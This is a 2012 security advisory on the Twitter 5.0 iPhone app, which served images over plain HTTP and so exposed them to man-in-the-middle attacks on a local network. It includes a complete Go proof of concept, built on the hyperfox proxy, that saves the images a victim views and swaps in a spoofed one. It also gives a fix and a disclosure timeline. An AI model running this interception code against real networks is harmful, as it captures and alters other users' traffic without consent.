## Twitter App vulnerable to eavesdropping * Vendor: Twitter Inc. * Product: Twitter 5.0 * Tested on: iPhone 4 (iOS 6.0) * Vendor notification: Nov 10, 2012. * Risk level: Low * Researcher: Carlos Reventlov * Link: http://reventlov.com/advisories/twitter-app-vulnerable-to-partial-mitm The Twitter 5.0 app for the iPhone is vulnerable to eavesdropping via [Man In The Middle][1], this vulnerability can lead an attacker on the same local area network (LAN) to capture and/or modify pictures the victim is seeing on the Twitter app. ### Details The Twitter app communicates with the Twitter API via HTTPs connections, however, picture images server by *.twimg.com are received through simple HTTP. ### Proof of concept Read http://reventlov.com/advisories/twitter-app-vulnerable-to-partial-mitm to see the PoC's screen captures. This custom [hyperfox][2] server will listen on `:9999`. This PoC captures pictures the user is seeing and sends a bogus picture (`spoof.jpg`) instead of the original. Read the [hyperfox][2] docs to know how to launch this PoC. Only images on the *.twimg.com domain are targeted. ```go /* Twitter App, eavesdroping PoC Written by Carlos Reventlov License MIT */ package main import ( "fmt" "github.com/xiam/hyperfox/proxy" "github.com/xiam/hyperfox/tools/logger" "io" "log" "os" "path" "strconv" "strings" ) const imageFile = "spoof.jpg" func init() { _, err := os.Stat(imageFile) if err != nil { panic(err.Error()) } } func replaceAvatar(pr *proxy.ProxyRequest) error { stat, _ := os.Stat(imageFile) image, _ := os.Open(imageFile) host := pr.Response.Request.Host if strings.HasSuffix(host, "twimg.com") == true { if pr.Response.ContentLength != 0 { file := "saved" + proxy.PS + pr.FileName var ext string contentType := pr.Response.Header.Get("Content-Type") switch contentType { case "image/jpeg": ext = ".jpg" case "image/gif": ext = ".gif" case "image/png": ext = ".png" case "image/tiff": ext = ".tiff" } if ext != "" { fmt.Printf("** Saving image.\n") os.MkdirAll(path.Dir(file), os.ModeDir|os.FileMode(0755)) fp, _ := os.Create(file) if fp == nil { fmt.Errorf(fmt.Sprintf("Could not open file %s for writing.", file)) } io.Copy(fp, pr.Response.Body) fp.Close() pr.Response.Body.Close() } } fmt.Printf("** Sending bogus image.\n") pr.Response.ContentLength = stat.Size() pr.Response.Header.Set("Content-Type", "image/jpeg") pr.Response.Header.Set("Content-Length", strconv.Itoa(int(pr.Response.ContentLength))) pr.Response.Body = image } return nil } func main() { p := proxy.New() p.AddDirector(logger.Client(os.Stdout)) p.AddInterceptor(replaceAvatar) p.AddLogger(logger.Server(os.Stdout)) var err error err = p.Start() if err != nil { log.Printf(fmt.Sprintf("Failed to bind: %s.\n", err.Error())) } } ``` ### Suggested fix Use HTTPs for serving *.twimg.com images so that an attacker would not be able to capture or modify avatars or (possible private) uploaded images. ## Disclosure timeline * Nov 10, 2012 Vulnerability discovered. * Nov 10, 2012 Vendor contacted. * Nov 15, 2012 Vendor response: "planned to be fixed on next release". * Nov 15, 2012 New release 5.1, bug is patched. * Nov 16, 2012 Full disclosure. [1]: http://en.wikipedia.org/wiki/Man-in-the-middle_attack [2]: http://reventlov.com/projects/hyperfox